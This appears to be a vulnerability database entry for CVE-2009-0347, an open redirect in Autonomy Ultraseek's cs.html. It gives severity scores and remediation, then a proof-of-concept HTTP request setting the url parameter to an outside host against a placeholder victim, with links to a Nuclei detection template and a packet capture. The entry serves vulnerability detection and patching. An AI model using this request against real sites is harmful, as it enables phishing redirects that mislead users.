| Title | Autonomy Ultraseek - Open Redirect |
|---|---|
| Author | ctflearner |
| Severity | Medium |
| Impact | An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. |
| Remediation | Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. |
| CVSS Score | 5.8 |
| EPSS Score | 0.03639 |
| CVE ID | CVE-2009-0347 |
| CWE ID | CWE-59 |
| Tags | cve cve2009 redirect autonomy vuln |
Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
GET /cs.html?url=http://www.interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-0347.yaml
🦈 Packet Capture: ⬇️ Download cve-2009-0347.pcap
N/AN/A